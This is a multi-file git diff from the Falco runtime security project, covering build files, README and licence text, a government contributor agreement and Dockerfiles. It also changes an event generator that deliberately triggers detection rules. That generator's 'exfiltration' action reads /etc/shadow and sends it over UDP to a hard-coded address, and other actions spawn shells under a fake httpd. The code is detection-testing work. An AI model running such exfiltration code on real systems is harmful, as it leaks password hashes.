@@ -318,15 +340,23 @@ if(NOT USE_BUNDLED_LIBYAML)
 		message(FATAL_ERROR "Couldn't find system libyaml")
 	endif()
 else()
+	find_path(AUTORECONF_BIN NAMES autoreconf)
+	if(AUTORECONF_BIN)
+		message(STATUS "Found autoreconf: ${AUTORECONF_BIN}")
+	else()
+		message(FATAL_ERROR "Couldn't find system autoreconf. Please install autoreconf before continuing or use system libyaml")
+	endif()
+
 	set(LIBYAML_SRC "${PROJECT_BINARY_DIR}/libyaml-prefix/src/libyaml/src")
 	set(LIBYAML_LIB "${LIBYAML_SRC}/.libs/libyaml.a")
+	message(STATUS "Using bundled libyaml in '${LIBYAML_SRC}'")
 	ExternalProject_Add(libyaml
-		URL "http://download.draios.com/dependencies/libyaml-0.1.4.tar.gz"
-                URL_MD5 "4a4bced818da0b9ae7fc8ebc690792a7"
-                BUILD_COMMAND ${CMD_MAKE}
-                BUILD_IN_SOURCE 1
+		URL "http://s3.amazonaws.com/download.draios.com/dependencies/libyaml-0.1.4.tar.gz"
+		URL_MD5 "4a4bced818da0b9ae7fc8ebc690792a7"
+		BUILD_COMMAND ${CMD_MAKE}
+		BUILD_IN_SOURCE 1
 		CONFIGURE_COMMAND ./bootstrap && ./configure
-                INSTALL_COMMAND "")
+		INSTALL_COMMAND "")
 endif()

 #
@@ -347,8 +377,17 @@ if(NOT USE_BUNDLED_LYAML)
 else()
 	set(LYAML_SRC "${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/ext/yaml")
 	set(LYAML_LIB "${LYAML_SRC}/.libs/yaml.a")
+	message(STATUS "Using bundled lyaml in '${LYAML_SRC}'")
+	set(LYAML_DEPENDENCIES "")
+	if(USE_BUNDLED_LUAJIT)
+		list(APPEND LYAML_DEPENDENCIES "luajit")
+	endif()
+	if(USE_BUNDLED_LIBYAML)
+		list(APPEND LYAML_DEPENDENCIES "libyaml")
+	endif()
 	ExternalProject_Add(lyaml
-		URL "http://download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
+		DEPENDS ${LYAML_DEPENDENCIES}
+		URL "http://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
                URL_MD5 "dc3494689a0dce7cf44e7a99c72b1f30"
                BUILD_COMMAND ${CMD_MAKE}
                BUILD_IN_SOURCE 1
@@ -359,13 +398,19 @@ endif()
 install(FILES falco.yaml
 	DESTINATION "${FALCO_ETC_DIR}")

-add_subdirectory("${SYSDIG_DIR}/driver" "${PROJECT_BINARY_DIR}/driver")
+add_subdirectory(rules)
+
+if(CMAKE_SYSTEM_NAME MATCHES "Linux")
+	add_subdirectory("${SYSDIG_DIR}/driver" "${PROJECT_BINARY_DIR}/driver")
+endif()
 add_subdirectory("${SYSDIG_DIR}/userspace/libscap" "${PROJECT_BINARY_DIR}/userspace/libscap")
 add_subdirectory("${SYSDIG_DIR}/userspace/libsinsp" "${PROJECT_BINARY_DIR}/userspace/libsinsp")

-add_subdirectory(scripts)
 set(FALCO_SINSP_LIBRARY sinsp)
-set(FALCO_SHARE_DIR ${CMAKE_INSTALL_PREFIX}/share/falco)
+set(FALCO_SHARE_DIR share/falco)
+set(FALCO_ABSOLUTE_SHARE_DIR "${CMAKE_INSTALL_PREFIX}/${FALCO_SHARE_DIR}")
+set(FALCO_BIN_DIR bin)
+add_subdirectory(scripts)
 add_subdirectory(userspace/engine)
 add_subdirectory(userspace/falco)

@@ -385,12 +430,12 @@ set(CPACK_GENERATOR DEB RPM TGZ)
 set(CPACK_DEBIAN_PACKAGE_MAINTAINER "Sysdig <support@sysdig.com>")
 set(CPACK_DEBIAN_PACKAGE_SECTION "utils")
 set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "http://www.sysdig.org")
-set(CPACK_DEBIAN_PACKAGE_DEPENDS "sysdig")
-set(CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA "${PROJECT_SOURCE_DIR}/scripts/debian/postinst;${PROJECT_SOURCE_DIR}/scripts/debian/prerm;${PROJECT_SOURCE_DIR}/scripts/debian/postrm")
+set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0)")
+set(CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA "${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${PROJECT_SOURCE_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cpack/debian/conffiles")

 set(CPACK_RPM_PACKAGE_LICENSE "GPLv2")
 set(CPACK_RPM_PACKAGE_URL "http://www.sysdig.org")
-set(CPACK_RPM_PACKAGE_REQUIRES "sysdig")
+set(CPACK_RPM_PACKAGE_REQUIRES "dkms, gcc, make, kernel-devel, perl")
 set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postinstall")
 set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/preuninstall")
 set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postuninstall")
--- a/12
+++ b/12
@@ -277,18 +277,6 @@ YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
 PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
 POSSIBILITY OF SUCH DAMAGES.

-* In addition, as a special exception, the copyright holders give
-* permission to link the code of portions of this program with the
-* OpenSSL library under certain conditions as described in each
-* individual source file, and distribute linked combinations
-* including the two.
-* You must obey the GNU General Public License in all respects
-* for all of the code used other than OpenSSL.  If you modify
-* file(s) with this exception, you may extend this exception to your
-* version of the file(s), but you are not obligated to do so.  If you
-* do not wish to do so, delete this exception statement from your
-* version.
-
                     END OF TERMS AND CONDITIONS

            How to Apply These Terms to Your New Programs
--- a/README.md
+++ b/README.md
@@ -1,8 +1,8 @@
 # Sysdig Falco

-####Latest release
+#### Latest release

-**v0.5.0**
+**v0.11.1**
 Read the [change log](https://github.com/draios/falco/blob/dev/CHANGELOG.md)

 Dev Branch: [![Build Status](https://travis-ci.org/draios/falco.svg?branch=dev)](https://travis-ci.org/draios/falco)<br />
@@ -29,22 +29,25 @@ One of the questions we often get when we talk about Sysdig Falco is “How does

 Documentation
 ---
-[Visit the wiki] (https://github.com/draios/falco/wiki) for full documentation on falco.
+[Visit the wiki](https://github.com/draios/falco/wiki) for full documentation on falco.

 Join the Community
 ---
-* Contact the [official mailing list] (https://groups.google.com/forum/#!forum/falco) for support and to talk with other users.
-* Follow us on [Twitter] (https://twitter.com/sysdig) for general falco and sysdig news.
-* This is our [blog] (https://sysdig.com/blog/), where you can find the latest [falco](https://sysdig.com/blog/tag/falco/) posts.
-* Join our [Public Slack](https://sysdig.slack.com) channel for sysdig and falco announcements and discussions.
+* Follow us on [Twitter](https://twitter.com/sysdig) for general falco and sysdig news.
+* This is our [blog](https://sysdig.com/blog/), where you can find the latest [falco](https://sysdig.com/blog/tag/falco/) posts.
+* Join our [Public Slack](https://slack.sysdig.com) channel for sysdig and falco announcements and discussions.

 License Terms
 ---
 Falco is licensed to you under the [GPL 2.0](./COPYING) open source license.

+In addition, as a special exception, the copyright holders give permission to link the code of portions of this program with the OpenSSL library under certain conditions as described in each individual source file, and distribute linked combinations including the two.
+
+You must obey the GNU General Public License in all respects for all of the code used other than OpenSSL.  If you modify file(s) with this exception, you may extend this exception to your version of the file(s), but you are not obligated to do so.  If you do not wish to do so, delete this exception statement from your version.
+
 Contributor License Agreements
 ---
-###Background
+### Background
 As we did for sysdig, we are formalizing the way that we accept contributions of code from the contributing community. We must now ask that contributions to falco be provided subject to the terms and conditions of a [Contributor License Agreement (CLA)](./cla). The CLA comes in two forms, applicable to contributions by individuals, or by legal entities such as corporations and their employees. We recognize that entering into a CLA with us involves real consideration on your part, and we’ve tried to make this process as clear and simple as possible.

 We’ve modeled our CLA off of industry standards, such as [the CLA used by Kubernetes](https://github.com/kubernetes/kubernetes/blob/master/CONTRIBUTING.md). Note that this agreement is not a transfer of copyright ownership, this simply is a license agreement for contributions, intended to clarify the intellectual property license granted with contributions from any person or entity. It is for your protection as a contributor as well as the protection of falco; it does not change your rights to use your own contributions for any other purpose.
@@ -57,19 +60,31 @@ Contributor License Agreements

 As always, we are grateful for your past and present contributions to falco.

-###What do I need to do in order to contribute code?
+### What do I need to do in order to contribute code?

 **Individual contributions**: Individuals who wish to make contributions must review the [Individual Contributor License Agreement](./cla/falco_contributor_agreement.txt) and indicate agreement by adding the following line to every GIT commit message:

+```
 falco-CLA-1.0-signed-off-by: Joe Smith <joe.smith@email.com>
+```

 Use your real name; pseudonyms or anonymous contributions are not allowed.

 **Corporate contributions**: Employees of corporations, members of LLCs or LLPs, or others acting on behalf of a contributing entity, must review the [Corporate Contributor License Agreement](./cla/falco_corp_contributor_agreement.txt), must be an authorized representative of the contributing entity, and indicate agreement to it on behalf of the contributing entity by adding the following lines to every GIT commit message:

 ```
- falco-CLA-1.0-contributing-entity: Full Legal Name of Entity
- falco-CLA-1.0-signed-off-by: Joe Smith <joe.smith@email.com>
+falco-CLA-1.0-contributing-entity: Full Legal Name of Entity
+falco-CLA-1.0-signed-off-by: Joe Smith <joe.smith@email.com>
+```
+
+Use a real name of a natural person who is an authorized representative of the contributing entity; pseudonyms or anonymous contributions are not allowed.
+
+**Government contributions**: Employees or officers of the United States Government, must review the [Government Contributor License Agreement](https://github.com/draios/falco/blob/dev/cla/falco_govt_contributor_agreement.txt), must be an authorized representative of the contributing entity, and indicate agreement to it on behalf of the contributing entity by adding the following lines to every GIT commit message:
+
+```
+falco-CLA-1.0-contributing-govt-entity: Full Legal Name of Entity
+falco-CLA-1.0-signed-off-by: Joe Smith <joe.smith@email.com>
+This file is a work of authorship of an employee or officer of the United States Government and is not subject to copyright in the United States under 17 USC 105.
 ```

 Use a real name of a natural person who is an authorized representative of the contributing entity; pseudonyms or anonymous contributions are not allowed.
--- a/cla/falco_govt_contributor_agreement.txt
+++ b/cla/falco_govt_contributor_agreement.txt
@@ -0,0 +1,33 @@
+DRAIOS, INC. <20> OPEN SOURCE CONTRIBUTION AGREEMENT FOR UNITED STATES GOVERNMENT CONTRIBUTING ENTITIES (<28>Agreement<6E>)
+
+Draios, Inc. (<28>Draios<6F> or <20>Sysdig<69>) welcomes the work of others on our open source software projects.  To contribute code back to our repositories, we require a contributing entity that is a United States Government agency to complete, and agree to, the Government Contributor Agreement (GCA) set forth here, by and through a designated authorized representative. This agreement clarifies the ability for us to use and incorporate the contributions of a government contributing entity in our projects and products. After agreeing to these terms, a contributing entity may contribute to our projects. To indicate the agreement of the contributing entity, an authorized representative shall follow the procedure set forth below under TO AGREE, after reading this Agreement. A <20>contributing entity<74> means any agency or unit of the United States government. We provide a separate CLA for individual contributors. 
+
+You accept and agree to the following terms and conditions for Your present and future Contributions that are submitted to Draios/Sysdig.
+
+1. Definitions.  "You" (or "Your") shall mean the contributing entity that has authored or otherwise has the right to contribute the Contribution, and that is making this Agreement with Draios/Sysdig. "Contribution" shall mean any original work of authorship, including any modifications or additions to an existing work, that is intentionally submitted by You to Draios/Sysdig for inclusion in, or documentation of, any of the products owned or managed by Draios/Sysdig (the "Work"). For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to Draios/Sysdig or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, Draios/Sysdig for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by You as "Not a Contribution."
+
+2. Contributions Not Subject to Copyright. Each Contribution is a work authored by the United States Government or an employee or officer thereof and is not subject to copyright under 17 U.S.C. 105.
+
+3. Grant of Patent License. Subject to the terms and conditions of this Agreement, You hereby grant to Draios/Sysdig and to recipients of software distributed by Draios/Sysdig a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims that You have the right to license and that are necessarily infringed by Your Contribution(s) alone or by combination of Your Contribution(s) with the Work to which such Contribution(s) was submitted. If any entity other than Draios/Sysdig institutes patent litigation against You or any other entity (including a cross-claim or counterclaim in a lawsuit) alleging that your Contribution, or the Work to which you have contributed, constitutes direct or contributory patent infringement, then any patent licenses granted to that entity under this Agreement for that Contribution or Work shall terminate as of the date such litigation is filed.
+
+4. You represent to Draios/Sysdig that You own or have the right to contribute Your Contributions to Draios/Sysdig, and that You are legally entitled to grant the license set forth above.
+
+5. You represent that each of Your Contributions is Your original creation (see section 7 for submissions on behalf of others). You represent that Your Contribution submissions include complete details of any third-party license or other restriction (including, but not limited to, related patents and trademarks) of which You are personally aware and which are associated with any part of Your Contributions. You represent that Your sign-off indicating assent to this Agreement includes the real name of a natural person who is an authorized representative of You, and not a pseudonym, and that You are not attempting or making an anonymous Contribution.
+
+6. You are not expected to provide support for Your Contributions, except to the extent You desire to provide support. You may provide support for free, for a fee, or not at all. Unless required by applicable law or agreed to in writing, You provide Your Contributions to Draios/Sysdig on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON- INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE.
+
+7. If You wish to submit work that is not Your original creation, You may submit it to Draios/Sysdig separately from any Contribution, identifying the complete details of its source and of any license or other restriction (including, but not limited to, related patents, trademarks, and license agreements) of which You are aware, and conspicuously marking the work as "Submitted on behalf of a third-party: [named here]".
+
+8. You agree to notify Draios/Sysdig of any facts or circumstances of which you become aware that would make these representations inaccurate in any respect.
+
+9. You understand and agree that this project and Your Contribution are public and that a record of the contribution, including all personal information that You submit with it, including the sign-off of Your authorized representative, may be stored by Draios/Sysdig indefinitely and may be redistributed to others. You understand and agree that Draios/Sysdig has no obligation to use any Contribution in any Draios/Sysdig project or product, and Draios/Sysdig may decline to accept Your Contributions or Draios/Sysdig may remove Your Contributions from Draios/Sysdig projects or products at any time without notice. You understand and agree that Draios/Sysdig is not and will not pay You any form of compensation, in currency, equity or otherwise, in exchange for Your Contributions or for Your assent to this Agreement. You understand and agree that You are independent of Draios/Sysdig and You are not, by entering into this Agreement or providing Your Contributions, becoming employed, hired as an independent contractor, or forming any other relationship with Draios/Sysdig relating to employment, compensation or ownership or involving any fiduciary obligation.
+
+TO AGREE:
+Add the following lines to every GIT commit message:
+
+falco-CLA-1.0-contributing-govt-entity: Full Legal Name of Entity
+falco-CLA-1.0-signed-off-by: Joe Smith joe.smith@email.com
+This file is a work of authorship of an employee or officer of the United States Government and is not subject to copyright in the United States under 17 USC 105.
+
+Use a real name of a natural person who is an authorized representative of the contributing entity; pseudonyms or anonymous contributions are not allowed.
+
--- a/cpack/debian/conffiles
+++ b/cpack/debian/conffiles
@@ -0,0 +1,4 @@
+/etc/falco/falco.yaml
+/etc/falco/falco_rules.yaml
+/etc/falco/rules.available/application_rules.yaml
+/etc/falco/falco_rules.local.yaml
--- a/docker/dev/Dockerfile
+++ b/docker/dev/Dockerfile
@@ -14,28 +14,32 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root

 ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/

-RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
- && apt-get update \
+RUN apt-get update \
 && apt-get install -y --no-install-recommends \
 	bash-completion \
-	curl \
-	jq \
-	gnupg2 \
+	bc \
+	clang-7 \
 	ca-certificates \
+	curl \
+	gnupg2 \
 	gcc \
 	gcc-5 \
-	gcc-4.9 && rm -rf /var/lib/apt/lists/*
+	gcc-6 \
+	gdb \
+	jq \
+	libc6-dev \
+	libelf-dev \
+	llvm-7 \
+ && rm -rf /var/lib/apt/lists/*

-# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
-# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
-# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
-# by symlinking it to 4.9
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc

-RUN rm -rf /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
+RUN rm -rf /usr/bin/clang \
+ && rm -rf /usr/bin/llc \
+ && ln -s /usr/bin/clang-7 /usr/bin/clang \
+ && ln -s /usr/bin/llc-7 /usr/bin/llc

 RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
 && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
@@ -44,7 +48,20 @@ RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public |
 && apt-get clean \
 && rm -rf /var/lib/apt/lists/*

-RUN ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
+# Some base images have an empty /lib/modules by default
+# If it's not empty, docker build will fail instead of
+# silently overwriting the existing directory
+RUN rm -df /lib/modules \
+ && ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
+
+# debian:unstable head contains binutils 2.31, which generates
+# binaries that are incompatible with kernels < 4.16. So manually
+# forcibly install binutils 2.30-22 instead.
+RUN curl -s -o binutils_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/binutils_2.30-22_amd64.deb \
+ && curl -s -o libbinutils_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/libbinutils_2.30-22_amd64.deb \
+ && curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+ && curl -s -o binutils-common_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/binutils-common_2.30-22_amd64.deb \
+ && dpkg -i *binutils*.deb

 COPY ./docker-entrypoint.sh /

--- a/docker/dev/docker-entrypoint.sh
+++ b/docker/dev/docker-entrypoint.sh
@@ -11,7 +11,7 @@ if [[ -z "${SYSDIG_SKIP_LOAD}" ]]; then
        ln -s $SYSDIG_HOST_ROOT/usr/src/$i /usr/src/$i
    done

-    /usr/bin/sysdig-probe-loader
+    /usr/bin/falco-probe-loader
 fi

 exec "$@"
--- a/docker/event-generator/event_generator.cpp
+++ b/docker/event-generator/event_generator.cpp
@@ -50,6 +50,8 @@ void usage(char *program)
 	printf("                                                     then read a sensitive file\n");
 	printf("          write_rpm_database                         Write to files below /var/lib/rpm\n");
 	printf("          spawn_shell                                Run a shell (bash)\n");
+	printf("                                                     Used by spawn_shell_under_httpd below\n");
+	printf("          spawn_shell_under_httpd                    Run a shell (bash) under a httpd process\n");
 	printf("          db_program_spawn_process                   As a database program, try to spawn\n");
 	printf("                                                     another program\n");
 	printf("          modify_binary_dirs                         Modify a file below /bin\n");
@@ -64,7 +66,7 @@ void usage(char *program)
 	printf("          non_sudo_setuid                            Setuid as a non-root user\n");
 	printf("          create_files_below_dev                     Create files below /dev\n");
 	printf("          exec_ls                                    execve() the program ls\n");
-	printf("                                                     (used by user_mgmt_binaries below)\n");
+	printf("                                                     (used by user_mgmt_binaries, db_program_spawn_process)\n");
 	printf("          user_mgmt_binaries                         Become the program \"vipw\", which triggers\n");
 	printf("                                                     rules related to user management programs\n");
 	printf("          exfiltration                               Read /etc/shadow and send it via udp to a\n");
@@ -97,6 +99,8 @@ void exfiltration()

 	shadow.open("/etc/shadow");

+	printf("Reading /etc/shadow and sending to 10.5.2.6:8197...\n");
+
 	if(!shadow.is_open())
 	{
 		fprintf(stderr, "Could not open /etc/shadow for reading: %s", strerror(errno));
@@ -219,7 +223,7 @@ void write_rpm_database() {
 }

 void spawn_shell() {
-	printf("Spawning a shell using system()...\n");
+	printf("Spawning a shell to run \"ls > /dev/null\" using system()...\n");
 	int rc;

 	if ((rc = system("ls > /dev/null")) != 0)
@@ -228,9 +232,14 @@ void spawn_shell() {
 	}
 }

+void spawn_shell_under_httpd() {
+	printf("Becoming the program \"httpd\" and then spawning a shell\n");
+	respawn("./httpd", "spawn_shell", "0");
+}
+
 void db_program_spawn_process() {
-	printf("Becoming the program \"mysql\" and then spawning a shell\n");
-	respawn("./mysqld", "spawn_shell", "0");
+	printf("Becoming the program \"mysql\" and then running ls\n");
+	respawn("./mysqld", "exec_ls", "0");
 }

 void modify_binary_dirs() {
@@ -259,6 +268,7 @@ void mkdir_binary_dirs() {

 void change_thread_namespace() {
 	printf("Calling setns() to change namespaces...\n");
+	printf("NOTE: does not result in a falco notification in containers, unless container run with --privileged or --security-opt seccomp=unconfined\n");
 	// It doesn't matter that the arguments to setns are
 	// bogus. It's the attempt to call it that will trigger the
 	// rule.
@@ -268,6 +278,7 @@ void change_thread_namespace() {
 void system_user_interactive() {
 	pid_t child;

+	printf("Forking a child that becomes user=daemon and then tries to run /bin/login...\n");
 	// Fork a child and do everything in the child.
 	if ((child = fork()) == 0)
 	{
@@ -285,23 +296,21 @@ void system_user_interactive() {
 }

 void network_activity() {
-	printf("Opening a listening socket on port 8192...\n");
+	printf("Connecting a udp socket to 10.2.3.4:8192...\n");
 	int rc;
 	int sock = socket(PF_INET, SOCK_DGRAM, 0);
 	struct sockaddr_in localhost;

 	localhost.sin_family = AF_INET;
 	localhost.sin_port = htons(8192);
-	inet_aton("127.0.0.1", &(localhost.sin_addr));
+	inet_aton("10.2.3.4", &(localhost.sin_addr));

-	if((rc = bind(sock, (struct sockaddr *) &localhost, sizeof(localhost))) != 0)
+	if((rc = connect(sock, (struct sockaddr *) &localhost, sizeof(localhost))) != 0)
 	{
 		fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno));
 		return;
 	}

-	listen(sock, 1);
-
 	close(sock);
 }

@@ -313,6 +322,8 @@ void system_procs_network_activity() {
 void non_sudo_setuid() {
 	pid_t child;

+	printf("Forking a child that becomes \"daemon\" user and then \"root\"...\n");
+
 	// Fork a child and do everything in the child.
 	if ((child = fork()) == 0)
 	{
@@ -354,6 +365,7 @@ map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
 					 {"read_sensitive_file_after_startup", read_sensitive_file_after_startup},
 					 {"write_rpm_database", write_rpm_database},
 					 {"spawn_shell", spawn_shell},
+					 {"spawn_shell_under_httpd", spawn_shell_under_httpd},
 					 {"db_program_spawn_process", db_program_spawn_process},
 					 {"modify_binary_dirs", modify_binary_dirs},
 					 {"mkdir_binary_dirs", mkdir_binary_dirs},
@@ -367,6 +379,9 @@ map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
 					 {"user_mgmt_binaries", user_mgmt_binaries},
 					 {"exfiltration", exfiltration}};

+// Some actions don't directly result in suspicious behavior. These
+// actions are excluded from the ones run with -a all.
+set<string> exclude_from_all_actions = {"spawn_shell", "exec_ls", "network_activity"};

 void create_symlinks(const char *program)
 {
@@ -394,9 +409,9 @@ void run_actions(map<string, action_t> &actions, int interval, bool once)
 	{
 		for (auto action : actions)
 		{
-			sleep(interval);
 			printf("***Action %s\n", action.first.c_str());
 			action.second();
+			sleep(interval);
 		}
 		if(once)
 		{
@@ -428,7 +443,7 @@ int main(int argc, char **argv)
 	// Parse the args
 	//
 	while((op = getopt_long(argc, argv,
-				"ha:i:l:",
+				"ha:i:l:o",
 				long_options, &long_index)) != -1)
 	{
 		switch(op)
@@ -437,12 +452,16 @@ int main(int argc, char **argv)
 			usage(argv[0]);
 			exit(1);
 		case 'a':
-			if((it = defined_actions.find(optarg)) == defined_actions.end())
+			// "all" is already implied
+			if (strcmp(optarg, "all") != 0)
 			{
-				fprintf(stderr, "No action with name \"%s\" known, exiting.\n", optarg);
-				exit(1);
+				if((it = defined_actions.find(optarg)) == defined_actions.end())
+				{
+					fprintf(stderr, "No action with name \"%s\" known, exiting.\n", optarg);
+					exit(1);
+				}
+				actions.insert(*it);
 			}
-			actions.insert(*it);
 			break;
 		case 'i':
 			interval = atoi(optarg);
@@ -482,7 +501,13 @@ int main(int argc, char **argv)

 	if(actions.size() == 0)
 	{
-		actions = defined_actions;
+		for(auto &act : defined_actions)
+		{
+			if(exclude_from_all_actions.find(act.first) == exclude_from_all_actions.end())
+			{
+				actions.insert(act);
+			}
+		}
 	}

 	setvbuf(stdout, NULL, _IONBF, 0);
--- a/docker/local/Dockerfile
+++ b/docker/local/Dockerfile
@@ -0,0 +1,66 @@
+FROM debian:unstable
+
+MAINTAINER Sysdig <support@sysdig.com>
+
+ENV FALCO_VERSION 0.1.1dev
+
+LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+
+ENV SYSDIG_HOST_ROOT /host
+
+ENV HOME /root
+
+RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
+
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
+
+RUN apt-get update \
+ && apt-get install -y --no-install-recommends \
+	bash-completion \
+	bc \
+	clang-7 \
+	ca-certificates \
+	curl \
+	dkms \
+	gnupg2 \
+	gcc \
+	gcc-5 \
+	gcc-6 \
+	jq \
+	libc6-dev \
+	libelf-dev \
+	llvm-7 \
+ && rm -rf /var/lib/apt/lists/*
+
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
+
+RUN rm -rf /usr/bin/clang \
+ && rm -rf /usr/bin/llc \
+ && ln -s /usr/bin/clang-7 /usr/bin/clang \
+ && ln -s /usr/bin/llc-7 /usr/bin/llc
+
+# Some base images have an empty /lib/modules by default
+# If it's not empty, docker build will fail instead of
+# silently overwriting the existing directory
+RUN rm -df /lib/modules \
+ && ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
+
+ADD falco-${FALCO_VERSION}-x86_64.deb /
+RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb
+
+# debian:unstable head contains binutils 2.31, which generates
+# binaries that are incompatible with kernels < 4.16. So manually
+# forcibly install binutils 2.30-22 instead.
+RUN curl -s -o binutils_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/binutils_2.30-22_amd64.deb \
+ && curl -s -o libbinutils_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/libbinutils_2.30-22_amd64.deb \
+ && curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+ && curl -s -o binutils-common_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/binutils-common_2.30-22_amd64.deb \
+ && dpkg -i *binutils*.deb
+
+COPY ./docker-entrypoint.sh /
+
+ENTRYPOINT ["/docker-entrypoint.sh"]
+
+CMD ["/usr/bin/falco"]
--- a/docker/local/docker-entrypoint.sh
+++ b/docker/local/docker-entrypoint.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+#set -e
+
+# Set the SYSDIG_SKIP_LOAD variable to skip loading the sysdig kernel module
+
+if [[ -z "${SYSDIG_SKIP_LOAD}" ]]; then
+    echo "* Setting up /usr/src links from host"
+
+    for i in $(ls $SYSDIG_HOST_ROOT/usr/src)
+    do
+        ln -s $SYSDIG_HOST_ROOT/usr/src/$i /usr/src/$i
+    done
+
+    /usr/bin/falco-probe-loader
+fi
+
+exec "$@"
--- a/docker/stable/Dockerfile
+++ b/docker/stable/Dockerfile
@@ -14,28 +14,31 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root

 ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/

-RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
- && apt-get update \
+RUN apt-get update \
 && apt-get install -y --no-install-recommends \
 	bash-completion \
-	curl \
-	jq \
+	bc \
+	clang-7 \
 	ca-certificates \
+	curl \
 	gnupg2 \
 	gcc \
 	gcc-5 \
-	gcc-4.9 && rm -rf /var/lib/apt/lists/*
+	gcc-6 \
+	jq \
+	libc6-dev \
+	libelf-dev \
+	llvm-7 \
+ && rm -rf /var/lib/apt/lists/*

-# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
-# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
-# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
-# by symlinking it to 4.9
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc

-RUN rm -rf /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
+RUN rm -rf /usr/bin/clang \
